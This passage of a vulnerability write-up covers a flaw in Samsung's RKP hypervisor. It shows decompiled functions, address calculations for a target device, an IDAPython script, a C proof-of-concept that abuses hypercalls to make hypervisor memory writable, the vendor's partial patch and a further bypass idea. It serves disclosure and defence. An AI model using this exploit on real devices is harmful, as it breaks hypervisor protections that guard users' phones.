    rkp_policy_violation("rox only allowed on kerenl PGD! l1t : %lx", table);
    return -1;
  }
  rkp_phys_map_lock(table);
  // Ensure the PGD is marked as `KERNEL|L1` in the physmap.
  if (is_phys_map_kernel(table) && is_phys_map_l1(table)) {
    res = 0;
    // Iterate over the PGD descriptors that map the address range.
    for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
      // Compute the start and end address of the region mapped by this descriptor.
      next_end_addr = (next_start_addr & 0xffffffffc0000000) + 0x40000000;
      if (next_end_addr > end_addr) {
        next_end_addr = end_addr;
      }
      table_desc_p = table + 8 * ((next_start_addr >> 30) & 0x1ff);
      // Set the AP bits to RO and unset the PXN bit of the descriptor.
      if (*table_desc_p) {
        set_rox_bits_of_desc(table_desc_p, 1);
      }
      // If the descriptor is a table descriptor.
      if ((*table_desc_p & 0b11) == 0b11) {
        // Call `set_range_to_rox_l2` to walk the PMD and set the regions of the address range as ROX.
        res += set_range_to_rox_l2(*table_desc_p & 0xfffffffff000, next_start_addr, next_end_addr);
      }
    }
  } else {
    res = -1;
  }
  rkp_phys_map_unlock(table);
  return res;
}

set_range_to_rox_l2 ensures the PMD is marked as KERNEL|L2 in the physmap. It then iterates over the descriptors that map the address range given as an argument and changes the memory attributes of these descriptors to make the memory read-only executable. In addition, for table descriptors, it calls set_range_to_rox_l3 to process the PTs.

int64_t set_range_to_rox_l2(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  rkp_phys_map_lock(table);
  // Ensure the PMD is marked as `KERNEL|L2` in the physmap.
  if (is_phys_map_kernel(table) && is_phys_map_l2(table)) {
    res = 0;
    // Iterate over the PMD descriptors that map the address range.
    for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
      // Compute the start and end address of the region mapped by this descriptor.
      next_end_addr = (next_start_addr & 0xffffffffffe00000) + 0x200000;
      if (next_end_addr > end_addr) {
        next_end_addr = end_addr;
      }
      table_desc_p = table + 8 * ((next_start_addr >> 21) & 0x1ff);
      // Set the AP bits to RO and unset the PXN bit of the descriptor.
      if (*table_desc_p) {
        set_rox_bits_of_desc(table_desc_p, 2);
      }
      // If the descriptor is a table descriptor.
      if ((*table_desc_p & 0b11) == 0b11) {
        res += set_range_to_rox_l3(*table_desc_p & 0xfffffffff000, next_start_addr, next_end_addr);
      }
    }
  } else {
    res = -1;
  }
  rkp_phys_map_unlock(table);
  return res;
}

set_range_to_rox_l3 checks if the PT is marked as KERNEL|L3 in the physmap. If it is not, the hypervisor starts protecting it by making it read-only in the second stage and marking it as KERNEL|L3 in the physmap. In both cases, it then iterates over the descriptors that map the address range given as an argument and changes the memory attributes of these descriptors to make the memory read-only and executable.

int64_t set_range_to_rox_l3(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
  // ...

  rkp_phys_map_lock(table);
  // Ensure the PT is NOT marked as `KERNEL|L3` in the physmap.
  if (!is_phys_map_kernel(table) || !is_phys_map_l3(table)) {
    // Call `rkp_s2_page_change_permission` to make it read-only in the second stage.
    res = rkp_s2_page_change_permission(table, 0x80 /* read-only */, 0 /* non-executable */, 0);
    if (res < 0) {
      uh_log('L', "rkp_l3pgt.c", 193, "rox l3t failed, %lx", table);
      rkp_phys_map_unlock(table);
      return res;
    }
    // Mark it as `KERNEL|L3` in the physmap.
    res = rkp_phys_map_set(table, FLAG2 | KERNEL | L3);
    if (res < 0) {
      rkp_phys_map_unlock(table);
      return res;
    }
  }
  // Iterate over the PT descriptors that map the address range.
  for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
    // Compute the start and end address of the region mapped by this descriptor.
    next_end_addr = (next_start_addr + 0x1000) & 0xfffffffffffff000;
    if (next_end_addr > end_addr) {
      next_end_addr = end_addr;
    }
    table_desc_p = table + 8 * ((next_start_addr >> 12) & 0x1ff);
    // If the descriptor is a page descriptor, set its AP bits to RO and unset its PXN bit.
    if ((*table_desc_p & 3) == 3) {
      set_rox_bits_of_desc(table_desc_p, 3);
    }
  }
  rkp_phys_map_unlock(table);
  return 0;
}

rkp_set_range_to_rox is also always called (from the "dynamic load" feature's functions) on swapper_pg_dir. It will thus walk the kernel page tables (stage 1) and change the memory attributes of the block and page descriptors spanning over the specified address range to make them read-only executable. The call to rkp_s2_page_change_permission that we are interested in also only happens for level 3 tables, but only if they are not marked KERNEL|L3 in the physmap.

It is not a good option for us either, for similar reasons: the target page is set as read-only in the stage 2, it requires having already written a user-controlled descriptor into the kernel page tables, and the "dynamic load" feature is only present on Exynos devices.

The Remaining Options

The last 2 functions that call rkp_s2_page_change_permission are rkp_set_pages_ro and rkp_ro_free_pages, which we have seen in the first blog post. Unfortunately, they give it as an argument an address that comes from a call to rkp_get_pa, so they are unusable for our exploit.

Finally, rkp_s2_range_change_permission, the function operating on an address range, is called from many dynamic_load_xxx functions, but the "dynamic load" feature is only available on Exynos devices, and we would like to keep the exploit as generic as possible.

Remapping Our Target Page

To exploit the vulnerability, we decided to use rkp_l1pgt_new_pgd and rkp_l1pgt_free_pgd. As mentioned previously, because these functions call rkp_l1pgt_process_table with a physical address returned by rkp_get_pa, we will be targeting the rkp_s2_page_change_permission call in rkp_l2pgt_process_table instead. To reach it, we need to give a "fake PGD" that contains a single descriptor pointing to a "fake PMD" (that will be overlapping with our target page in hypervisor memory) as input to the rkp_l1pgt_process_table function.

  +------------------+  .-> +------------------+
  |                  |  |   |                  |
  +------------------+  |   +------------------+
  | table descriptor ---'   |                  |
  +------------------+      +------------------+
  |                  |      |                  |
  +------------------+      +------------------+
  |                  |      |                  |
  +------------------+      +------------------+

       "fake PMD"                "fake PUD"
    in kernel memory        in hypervisor memory

The first step of the exploit is to call the rkp_cmd_new_pgd command handler, which simply calls rkp_l1pgt_new_pgd. It itself calls rkp_l1pgt_process_table, which will process our "fake PGD" (in the code below, high_bits will be 0 and is_alloc will be 1). More specifically, it will set our "fake PGD" as L1 in the physmap, set it as read-only in the stage 2, then call rkp_l2pgt_process_table to process our "fake PMD".

int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
  // ...
  rkp_phys_map_lock(pgd);
  // If we are introducing this PGD.
  if (is_alloc) {
    // If it is already marked as a PGD in the physmap, return without processing it.
    if (is_phys_map_l1(pgd)) {
      rkp_phys_map_unlock(pgd);
      return 0;
    }
    // ...
    // And mark the PGD as such in the physmap.
    res = rkp_phys_map_set(pgd, type /* L1 */);
    // ...
    // Make the PGD read-only in the second stage.
    res = rkp_s2_page_change_permission(pgd, 0x80 /* read-only */, 0 /* non-executable */, 0);
    // ...
  }
  // ...
  // Now iterate over each descriptor of the PGD.
  do {
    // ...
    // Block descriptor (not a table, not invalid).
    if ((desc & 0b11) != 0b11) {
      if (desc) {
        // Make the memory non executable at EL1.
        set_pxn_bit_of_desc(desc_p, 1);
      }
    }
    // Table descriptor.
    else {
      addr = start_addr & 0xffffff803fffffff | offset;
      // Call rkp_l2pgt_process_table to process the PMD.
      res += rkp_l2pgt_process_table(desc & 0xfffffffff000, addr, is_alloc);
      // ...
      // Make the memory non executable at EL1 for user PGDs.
      set_pxn_bit_of_desc(desc_p, 1);
    }
    // ...
  } while (entry != 0x1000);
  rkp_phys_map_unlock(pgd);
  return res;
}

rkp_l2pgt_process_table then processes our "fake PMD": it marks it as L2 in the physmap, sets it as read-only in the stage 2 page tables, and calls check_single_l2e on each of its entries (which we don't have control over).

int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
  // ...
  rkp_phys_map_lock(pmd);
  // If we are introducing this PMD.
  if (is_alloc) {
    // If it is already marked as a PMD in the physmap, return without processing it.
    if (is_phys_map_l2(pmd)) {
      rkp_phys_map_unlock(pmd);
      return 0;
    }
    // ...
    // And mark the PMD as such in the physmap.
    res = rkp_phys_map_set(pmd, type /* L2 */);
    // ...
    // Make the PMD read-only in the second stage.
    res = rkp_s2_page_change_permission(pmd, 0x80 /* read-only */, 0 /* non-executable */, 0);
    // ...
  }
  // ...
  // Now iterate over each descriptor of the PMD.
  offset = 0;
  for (i = 0; i != 0x1000; i += 8) {
    addr = offset | start_addr & 0xffffffffc01fffff;
    // Call `check_single_l2e` on each descriptor.
    res += check_single_l2e(pmd + i, addr, is_alloc);
    offset += 0x200000;
  }
  rkp_phys_map_unlock(pmd);
  return res;
}

check_single_l2e will set the PXN bit of the descriptor (which in our case is each 8-byte value in our target page) and will also process values that look like table descriptors. That's something we will need to keep in mind when choosing our target page in hypervisor memory.

int64_t check_single_l2e(int64_t* desc_p, uint64_t start_addr, signed int32_t is_alloc) {
  // ...
  // The virtual address is not executable, set the PXN bit of the descriptor.
  set_pxn_bit_of_desc(desc_p, 2);
  // ...
  // Get the descriptor type.
  desc = *desc_p;
  type = desc & 0b11;
  // Block descriptor, return without processing it.
  if (type == 0b01) {
    return 0;
  }
  // Invalid descriptor, return without processing it.
  if (type != 0b11) {
    if (desc) {
      uh_log('L', "rkp_l2pgt.c", 64, "Invalid l2e %p %p %p", desc, is_alloc, desc_p);
    }
    return 0;
  }
  // ...
  // Call rkp_l3pgt_process_table to process the PT.
  return rkp_l3pgt_process_table(*desc_p & 0xfffffffff000, start_addr, is_alloc, protect);
}

Up to this point, we have gotten our target page marked as L2 in the physmap, and remapped as read-only in the stage 2 page tables. That's great, but to be able to modify it from the kernel, we need to have it mapped as writable in the second stage.

The second step of the exploit is to call the rkp_cmd_free_pgd command handler, which simply calls rkp_l1pgt_free_pgd. It itself calls rkp_l1pgt_process_table, which once again will process our "fake PGD" (in the code below, high_bits will be 0 and is_alloc will this time be 0). More specifically, it will set our "fake PGD" as FREE in the physmap, set it as read-write in the stage 2, then call rkp_l2pgt_process_table to process our "fake PMD".

int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
  // ...
  rkp_phys_map_lock(pgd);
  // ...
  // If we are retiring this PGD.
  if (!is_alloc) {
    // If it is not marked as a PGD in the physmap, return without processing it.
    if (!is_phys_map_l1(pgd)) {
      rkp_phys_map_unlock(pgd);
      return 0;
    }
    // Mark the PGD as `FREE` in the physmap.
    res = rkp_phys_map_set(pgd, FREE);
    // ...
    // Make the PGD writable in the second stage.
    res = rkp_s2_page_change_permission(pgd, 0 /* writable */, 1 /* executable */, 0);
    // ...
  }
  // Now iterate over each descriptor of the PGD.
  offset = 0;
  entry = 0;
  start_addr = high_bits << 39;
  do {
    // Block descriptor (not a table, not invalid).
    if ((desc & 0b11) != 0b11) {
      if (desc) {
        // Make the memory non executable at EL1.
        set_pxn_bit_of_desc(desc_p, 1);
      }
    } else {
      addr = start_addr & 0xffffff803fffffff | offset;
      // Call rkp_l2pgt_process_table to process the PMD.
      res += rkp_l2pgt_process_table(desc & 0xfffffffff000, addr, is_alloc);
      // ...
      // Make the memory non executable at EL1 for user PGDs.
      set_pxn_bit_of_desc(desc_p, 1);
    }
    // ...
  } while (entry != 0x1000);
  rkp_phys_map_unlock(pgd);
  return res;
}

rkp_l2pgt_process_table then processes our "fake PMD": it marks it as FREE in the physmap, sets it as read-write in the stage 2 page tables, and calls check_single_l2e again on each of its entries (which will do the same as before).

int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
  // ...
  rkp_phys_map_lock(pmd);
  // ...
  // If we are retiring this PMD.
  if (!is_alloc) {
    // If it is not marked as a PMD in the physmap, return without processing it.
    if (!is_phys_map_l2(pmd)) {
      rkp_phys_map_unlock(pmd);
      return 0;
    }
    // ...
    // Mark the PMD as `FREE` in the physmap.
    res = rkp_phys_map_set(pmd, FREE);
    // ...
    // Make the PMD writable in the second stage.
    res = rkp_s2_page_change_permission(pmd, 0 /* writable */, 1 /* executable */, 0);
    // ...
  }
  // Now iterate over each descriptor of the PMD.
  offset = 0;
  for (i = 0; i != 0x1000; i += 8) {
    addr = offset | start_addr & 0xffffffffc01fffff;
    // Call `check_single_l2e` on each descriptor.
    res += check_single_l2e(pmd + i, addr, is_alloc);
    offset += 0x200000;
  }
  rkp_phys_map_unlock(pmd);
  return res;
}

We have finally gotten our target page remapped as writable in the stage 2 page tables. Perfect, now we need to find a target page that will not make the hypervisor crash when its contents are processed by the check_single_l2e function.

Choosing A Target Page

Because check_single_l2e sets the PXN bit of the "fake PMD" descriptors (i.e. the content of our target page) and further processes values that look like table descriptors, we cannot directly target pages located in RKP's code segment. Our target must be writable from EL2, which is the case for RKP's page tables (either the stage 2 page tables for EL1 or the page tables for EL2). But by virtue of being page tables, they contain valid descriptors, so they are very likely to make RKP or the kernel crash at some point as a result of this processing. That is why we didn't target them.

Instead, we chose to target the memory page backing the protected_ranges memlist, which is the page that contains all its memlist_entry_t instances. It contains values that are always aligned on 8 bytes, so they look like invalid descriptors to the check_single_l2e function. And by nullifying this list from the kernel, we would then be able to provide addresses inside hypervisor memory to all the command handlers.

This protected_ranges memlist is allocated in the pa_restrict_init function:

int64_t pa_restrict_init() {
  // Initialize the memlist of protected ranges.
  memlist_init(&protected_ranges);
  // Add the uH memory region to it (containing the hypervisor code and data).
  memlist_add(&protected_ranges, 0x87000000, 0x200000);
  // ...
}

To know precisely where the memory backing this memlist will be allocated, we need to dig into the memlist_init function. It preallocates enough space for 5 entries (the default capacity) by calling the memlist_reserve function before initializing the structure's fields.

int64_t memlist_init(memlist_t* list) {
  // ...
  // Reset the structure fields.
  memset(list, 0, sizeof(memlist_t));
  // By default, preallocate space for 5 entries.
  res = memlist_reserve(list, 5);
  // Fill the structure fields accordingly.
  list->capacity = 5;
  list->merged = 0;
  list->unkn_14 = 0;
  cs_init(&list->cs);
  return res;
}

It turns out the protected_ranges memlist never stores more than 5 memory regions, even with the memory backing the physmap being added to it. Thus, it never gets reallocated, and there's only ever one allocation made. Now let's see what the memlist_reserve function does. It allocates space for the specified number of memlist_entry entries and copies the old entries to the newly allocated memory, if there were any.

int64_t memlist_reserve(memlist_t* list, uint64_t size) {
  // ...

  // Sanity-check the arguments.
  if (!list || !size) {
    return -1;
  }
  // Allocate memory for `size` entries of type `memlist_entry`.
  base = heap_alloc(0x20 * size, 0);
  if (!base) {
    return -1;
  }
  // Reset the memory that was just allocated.
  memset(base, 0, 0x20 * size);
  // If the list already contains some entries.
  if (list->base) {
    // Copy these entries from the old array to the new one.
    for (index = 0; index < list->count; ++index) {
      new_entry = &base[index];
      old_entry = &list->base[index];
      new_entry->addr = old_entry->addr;
      new_entry->size = old_entry->size;
      new_entry->unkn_10 = old_entry->unkn_10;
      new_entry->extra = old_entry->extra;
    }
    // And free the old memory.
    heap_free(list->base);
  }
  list->base = base;
  return 0;
}

The memory is allocated by memlist_reserve by calling heap_alloc, so it comes from the "static heap" allocator. In pa_restrict_init, when the allocation for the protected_ranges memlist is made, the "static heap" contains:

  • the complete hypervisor memory: 0x87000000-0x87200000;
  • minus the log region: 0x87100000-0x87140000;
  • minus the uH/RKP region: 0x87000000-0x87046000;
  • minus the "bigdata" region: 0x870FF000-0x87100000.

So we know the address returned by the allocator should be somewhere after 0x87046000 (i.e. between the uH/RKP and "bigdata" regions). To know at which address exactly it will be, we need to find all the allocations that are performed before pa_restrict_init is called.

By carefully tracing the execution statically, we find 4 "static heap" allocations:

  • The first allocation of size 0x8A happens in rkp_init_cmd_counts;
  • The second allocation of size 0x230 happens in uh_init_bigdata;
  • The third allocation of size 0x1000 happens in uh_init_context;
  • The fourth allocation of size 0xA0 comes from the memlist_init(&dynamic_regions) call in uh_init.

int64_t uh_init(int64_t uh_base, int64_t uh_size) {
  // ...
  apps_init();
  uh_init_bigdata();
  uh_init_context();
  memlist_init(&uh_state.dynamic_regions);
  pa_restrict_init();
  // ...
}
uint64_t apps_init() {
  // ...
  res = uh_handle_command(i, 0, &saved_regs);
  // ...
}
int64_t uh_handle_command(uint64_t app_id, uint64_t cmd_id, saved_regs_t* regs) {
  // ...
  return cmd_handler(regs);
}
int64_t rkp_cmd_init() {
  // ...
  rkp_init_cmd_counts();
  // ...
}
uint8_t* rkp_init_cmd_counts() {
  // ...
  malloc(0x8a, 0);
  // ...
}
int64_t uh_init_bigdata() {
  if (!bigdata_state) {
    bigdata_state = malloc(0x230, 0);
  }
  memset(0x870ffc40, 0, 0x3c0);
  memset(bigdata_state, 0, 0x230);
  return s1_map(0x870ff000, 0x1000, UNKN3 | WRITE | READ);
}
int64_t* uh_init_context() {
  // ...

  uh_context = malloc(0x1000, 0);
  if (!uh_context) {
    uh_log('W', "RKP_1cae4f3b", 21, "%s RKP_148c665c", "uh_init_context");
  }
  return memset(uh_context, 0, 0x1000);
}

Now we are ready to calculate the address. Each allocation has a header of 0x18 bytes, and the allocator rounds up the total size to the next 8-byte boundary. By doing our math properly, we find that the physical address of the protected_ranges allocation is 0x870473D8:

>>> f = lambda x: (x + 0x18 + 7) & 0xFFFFFFF8
>>> 0x87046000 + f(0x8A) + f(0x230) + f(0x1000) + f(0xA0) + 0x18
0x870473D8

We also need to know what's in the same page (0x87047000) as the protected_ranges memlist. Thanks to our tracing of the prior allocations, we know that it is preceded by the uh_context, which is memset and only used on panics. Similarly, we can determine that it is followed by a memlist reallocation in init_cmd_add_dynamic_region and a stage 2 page table allocation in init_cmd_initialize_dynamic_heap with a page-sized padding. This means that there should be no value looking like a page table descriptor in this page (on our test device).

After making the page containing the protected_ranges memlist writable in the stage 2 using the rkp_cmd_new_pgd and rkp_cmd_free_pgd commands, we directly modify it from the kernel. Our goal is to make check_kernel_input always return 0 so that we can give arbitrary addresses (including addresses in hypervisor memory) to all command handlers. check_kernel_input calls protected_ranges_contains, which itself calls memlist_contains_addr. This function simply checks if the address is within any of the regions of the memlist.

int64_t memlist_contains_addr(memlist_t* list, uint64_t addr) {
  // ...
  cs_enter(&list->cs);
  // Iterate over each of the entries of the memlist.
  for (index = 0; index < list->count; ++index) {
    entry = &list->base[index];
    // If the address is within the start address and end address of the region.
    if (addr >= entry->addr && addr < entry->addr + entry->size) {
      cs_exit(&list->cs);
      return 1;
    }
  }
  cs_exit(&list->cs);
  return 0;
}

The first entry in protected_ranges is the hypervisor memory region. Zeroing its size field (at offset 8) should be enough to disable the blacklist.

Getting Code Execution

The final step to fully compromise the hypervisor is to get arbitrary code execution, which is fairly easy now that we can give any address to all command handlers. This can be achieved in multiple ways, but the simplest way is likely to modify the page tables of the stage 2 at EL1.

For example, we can target the level 2 descriptor that covers the memory range of the hypervisor and turn it into a writable block descriptor. The write itself can be performed by calling rkp_cmd_write_pgt3 (that calls rkp_l3pgt_write) since we have disabled the protected_ranges memlist.

To find the physical address of the target descriptor, we can dump the initial stage 2 page tables at EL1 using an IDAPython script:

import ida_bytes

def parse_static_s2_page_tables(table, level=1, start_vaddr=0):
    size = [0x8000000000, 0x40000000, 0x200000, 0x1000][level]

    for i in range(512):
        desc_addr = table + i * 8
        desc = ida_bytes.get_qword(desc_addr)
        if (desc & 0b11) == 0b00 or (desc & 0b11) == 0b01:
            continue
        paddr = desc & 0xFFFFFFFFF000
        vaddr = start_vaddr + i * size

        if level < 3 and (desc & 0b11) == 0b11:
            print("L%d Table for %016x-%016x is at %08x" \
                  % (level + 1, vaddr, vaddr + size, paddr))
            parse_static_s2_page_tables(paddr, level + 1, vaddr)

parse_static_s2_page_tables(0x87028000)

Below is the result of running this script on the binary running on our target device.

L2 Table for 0000000000000000-0000000040000000 is at 87032000
L3 Table for 0000000002000000-0000000002200000 is at 87033000
L2 Table for 0000000080000000-00000000c0000000 is at 8702a000
L2 Table for 00000000c0000000-0000000100000000 is at 8702b000
L2 Table for 0000000880000000-00000008c0000000 is at 8702c000
L2 Table for 00000008c0000000-0000000900000000 is at 8702d000
L2 Table for 0000000900000000-0000000940000000 is at 8702e000
L2 Table for 0000000940000000-0000000980000000 is at 8702f000
L2 Table for 0000000980000000-00000009c0000000 is at 87030000
L2 Table for 00000009c0000000-0000000a00000000 is at 87031000

We know that the L2 table that maps 0x80000000-0xc0000000 is located at 0x8702A000. To obtain the descriptor's address, which depends on the target address (0x87000000) and the size of a L2 block (0x200000), we simply need to add an offset to the address of the L2 table:

>>> 0x8702A000 + ((0x87000000 - 0x80000000) // 0x200000) * 8
0x8702A1C0

The descriptor's value is composed of the target address and the wanted attributes: 0x87000000 | 0x4FD = 0x870004FD.

0 1 00 11 1111 01 = 0x4FD
^ ^ ^  ^  ^    ^
| | |  |  |    `-- Type: block descriptor
| | |  |  `------- MemAttr[3:0]: NM, OWBC, IWBC
| | |  `---------- S2AP[1:0]: read/write
| | `------------- SH[1:0]: NS
| `--------------- AF: 1
`----------------- FnXS: 0
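
As a quick sanity check of the value above, the attributes can be rebuilt field by field (a throwaway snippet of ours, independent of the exploit itself):

#include <assert.h>
#include <stdint.h>

int main(void) {
    uint64_t attrs = 0;
    attrs |= 0x1UL;        /* bits [1:0]  type: block descriptor        */
    attrs |= 0xFUL << 2;   /* bits [5:2]  MemAttr: normal, WB cacheable */
    attrs |= 0x3UL << 6;   /* bits [7:6]  S2AP: read/write              */
    attrs |= 0x0UL << 8;   /* bits [9:8]  SH: non-shareable             */
    attrs |= 0x1UL << 10;  /* bit  [10]   AF: accessed                  */
    assert(attrs == 0x4FD);
    assert((0x87000000UL | attrs) == 0x870004FDUL);
    return 0;
}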

The descriptor is changed by calling rkp_cmd_write_pgt3, which calls rkp_l3pgt_write. Since we are writing to an existing page table that is marked as L3 in the physmap and the new value is a block descriptor, the check passes, and the write is performed in set_entry_of_pgt.

int64_t* rkp_l3pgt_write(uint64_t ptep, int64_t pte_val) {
  // ...
  // Convert the PT descriptor PA into a VA.
  ptep_pa = rkp_get_pa(ptep);
  rkp_phys_map_lock(ptep_pa);
  // If the PT is marked as such in the physmap, or as `FREE`.
  if (is_phys_map_l3(ptep_pa) || is_phys_map_free(ptep_pa)) {
    // If the new descriptor is not a page descriptor, or its PXN bit is set, the check passes.
    if ((pte_val & 0b11) != 0b11 || get_pxn_bit_of_desc(pte_val, 3)) {
      allowed = 1;
    }
    // Otherwise, the check fails if RKP is deferred initialized.
    else {
      allowed = rkp_deferred_inited == 0;
    }
  }
  // If the PT is marked as something else, the check also fails.
  else {
    allowed = 0;
  }
  rkp_phys_map_unlock(ptep_pa);
  // If the check failed, trigger a policy violation.
  if (!allowed) {
    pxn_bit = get_pxn_bit_of_desc(pte_val, 3);
    return rkp_policy_violation("Write L3 to wrong page type, %lx, %lx, %x", ptep_pa, pte_val, pxn_bit);
  }
  // Otherwise, perform the write of the PT descriptor on behalf of the kernel.
  return set_entry_of_pgt(ptep_pa, pte_val);
}
uint64_t* set_entry_of_pgt(uint64_t* ptr, uint64_t val) {
  *ptr = val;
  return ptr;
}

Proof of Concept

This simple proof of concept assumes that we have obtained kernel memory read/write primitives and can make hypervisor calls.

#define UH_APP_RKP 0xC300C002

#define RKP_CMD_NEW_PGD    0x0A
#define RKP_CMD_FREE_PGD   0x09
#define RKP_CMD_WRITE_PGT3 0x05

#define PROTECTED_RANGES_BITMAP 0x870473D8
#define BLOCK_DESC_ADDR         0x8702A1C0
#define BLOCK_DESC_DATA         0x870004FD

uint64_t pa_to_va(uint64_t pa) {
    return pa - 0x80000000UL + 0xFFFFFFC000000000UL;
}

void exploit() {
    /* allocate and clear our "fake PGD" */
    uint64_t pgd = kernel_alloc(0x1000);
    for (uint64_t i = 0; i < 0x1000; i += 8)
        kernel_write(pgd + i, 0UL);

    /* write our "fake PMD" descriptor */
    kernel_write(pgd, (PROTECTED_RANGES_BITMAP & 0xFFFFFFFFF000UL) | 3UL);

    /* make the hyp call that will set the page RO */
    kernel_hyp_call(UH_APP_RKP, RKP_CMD_NEW_PGD, pgd);
    /* make the hyp call that will set the page RW */
    kernel_hyp_call(UH_APP_RKP, RKP_CMD_FREE_PGD, pgd);

    /* zero out the "protected ranges" first entry */
    kernel_write(pa_to_va(PROTECTED_RANGES_BITMAP + 8), 0UL);

    /* write the descriptor to make hyp memory writable */
    kernel_hyp_call(UH_APP_RKP, RKP_CMD_WRITE_PGT3,
                    pa_to_va(BLOCK_DESC_ADDR), BLOCK_DESC_DATA);
}

The exploit was successfully tested on the most recent firmware available for our test device (at the time we reported this vulnerability to Samsung): A515FXXU4CTJ1. The two-fold bug appeared to be present in the binaries of both Exynos and Snapdragon devices, including the S10/S10+/S20/S20+ flagship devices. However, its exploitability on these devices is uncertain.

The prerequisites for exploiting this vulnerability are high: being able to make hypervisor calls with only an arbitrary read and write of kernel memory is no small feat on devices where JOPP/ROPP are enabled. In particular, on Snapdragon devices, the s2_map function (called from rkp_s2_page_change_permission and rkp_s2_range_change_permission) makes an indirect call to a QHEE function (since it is QHEE that is in charge of the stage 2 page tables). We did not follow this call to see if it made any additional checks that could prevent the exploitation of this vulnerability. On the Galaxy S20, there is also an indirect call to the new hypervisor framework (called H-Arx), which we did not follow either.

The memory layout will also be different on other devices than the one we have targeted in the exploit, so the hard-coded addresses won't work. But we believe that they can be adapted or that an alternative exploitation strategy can be found for these devices.

Patch

Here are the immediate remediation steps we suggested to Samsung:

- Mark the pages unmapped by s2_unmap as S2UNMAP in the physmap
- Perform the additional checks of rkp_s2_page_change_permission in
rkp_s2_range_change_permission as well
- Add calls to check_kernel_input in the rkp_lxpgt_process_table functions

First Patch

After being notified by Samsung that the vulnerability had been patched, we downloaded the latest firmware update for our test device, the Samsung Galaxy A51. But we quickly noticed it hadn't been updated to the June patch level yet, so we had to do our binary diffing on the latest firmware update for the Samsung Galaxy S10 instead. The exact version used was G973FXXSBFUF3.

The first changes were made to the rkp_s2_page_change_permission function. It now takes a type argument that it uses to mark the page in the physmap, regardless of whether the checks pass or fail. In addition, the physmap and ro_bitmap updates are now made before changing the stage 2 page tables when setting a page read-only, and after when setting it back to read-write.

int64_t rkp_s2_page_change_permission(void* p_addr,
                                      uint64_t access,
+                                      uint32_t type,
                                      uint32_t exec,
                                      uint32_t allow) {
  // ...

  if (!allow && !rkp_inited) {
    // ...
-    return -1;
+    return rkp_phys_map_set(p_addr, type) ? -1 : 0;
  }
  if (is_phys_map_s2unmap(p_addr)) {
    // ...
-    return -1;
+    return rkp_phys_map_set(p_addr, type) ? -1 : 0;
  }
  if (page_allocator_is_allocated(p_addr) == 1
        || (p_addr >= TEXT_PA && p_addr < ETEXT_PA)
        || (p_addr >= rkp_get_pa(SRODATA) && p_addr < rkp_get_pa(ERODATA)))
-    return 0;
+    return rkp_phys_map_set(p_addr, type) ? -1 : 0;
  // ...
+  if (access == 0x80) {
+    if (rkp_phys_map_set(p_addr, type) || rkp_set_pgt_bitmap(p_addr, access))
+      return -1;
+  }
  if (map_s2_page(p_addr, p_addr, 0x1000, attrs) < 0) {
    rkp_policy_violation("map_s2_page failed, p_addr : %p, attrs : %d", p_addr, attrs);
    return -1;
  }
  tlbivaae1is(((p_addr + 0x80000000) | 0xFFFFFFC000000000) >> 12);
-  return rkp_set_pgt_bitmap(p_addr, access);
+  if (access != 0x80)
+    if (rkp_phys_map_set(p_addr, type) || rkp_set_pgt_bitmap(p_addr, access))
+      return -1;
+  return 0;

Surprisingly, no changes were made to the rkp_s2_range_change_permission function. So far, none of the changes prevent using these two functions to remap previously unmapped memory.

The second set of changes were to the rkp_l1pgt_process_table, rkp_l2pgt_process_table, and rkp_l3pgt_process_table functions. In each of these functions, a call to check_kernel_input has been added in the allocation path before changing the stage 2 permissions of the page.

int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
  // ...
  if (is_alloc) {
+    check_kernel_input(pgd);
    // ...
  } else {
    // ...
  }
  // ...
}
int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
  // ...
  if (is_alloc) {
+    check_kernel_input(pmd);
    // ...
  } else {
    // ...
  }
}
int64_t rkp_l3pgt_process_table(int64_t pte, uint64_t start_addr, uint32_t is_alloc, int32_t protect) {
  // ...
  if (is_alloc) {
+    check_kernel_input(pte);
    // ...
  } else {
    // ...
  }
  // ...
}

These changes make it so that we can no longer use the specific code path implemented in our exploit to call rkp_s2_page_change_permission. However, it doesn't prevent any of the other ways to call this function that we presented earlier.

We were unable to find a change that fixes the actual issue, which is that pages unmapped in the stage 2 are not marked as S2UNMAP in the physmap. To demonstrate to Samsung that their fix was not sufficient, we started looking for a new exploitation strategy. While we were, unfortunately, unable to test it on a real device due to a lack of time, we devised the theoretical approach explained below.

Finding A New Exploit Path

In the Exploring Our Options section, we mentioned that the set_range_to_rox_l3 and set_range_to_pxn_l3 functions can be used to reach a call to rkp_s2_page_change_permission, but with two major caveats. First, to call them on our target page, a table descriptor in a kernel PMD needs to point to it. Second, they are part of the "dynamic load" feature that is only available on Exynos devices.

However, if we are able to call these functions, we can easily make our target page writable in the second stage. We can first call set_range_to_rox_l3 to mark our target page KERNEL|L3 in the physmap but also make it read-only in the second stage. We can then call set_range_to_pxn_l3, which requires it to be marked KERNEL|L3 in physmap but also makes it writable in the second stage.

Writing The Kernel Page Tables

Our new strategy requires our target page to be pointed to by a table descriptor of a kernel PMD. This can be accomplished by changing an invalid descriptor into a table descriptor pointing to a "fake PT" that is actually our target page of hypervisor memory, as illustrated below.

                            |
  +--------------------+    |    +--------------------+  .-> +--------------------+
  |                    |    |    |                    |  |   |                    |
  +--------------------+    |    +--------------------+  |   +--------------------+
  | invalid descriptor |    |    |  table descriptor  ---'   |                    |
  +--------------------+    |    +--------------------+      +--------------------+
  |                    |    |    |                    |      |                    |
  +--------------------+    |    +--------------------+      +--------------------+
  |                    |    |    |                    |      |                    |
  +--------------------+    |    +--------------------+      +--------------------+
                            |
        read PMD            |           read PMD                    "fake PT"
     in kernel memory       |        in kernel memory         in hypervisor memory

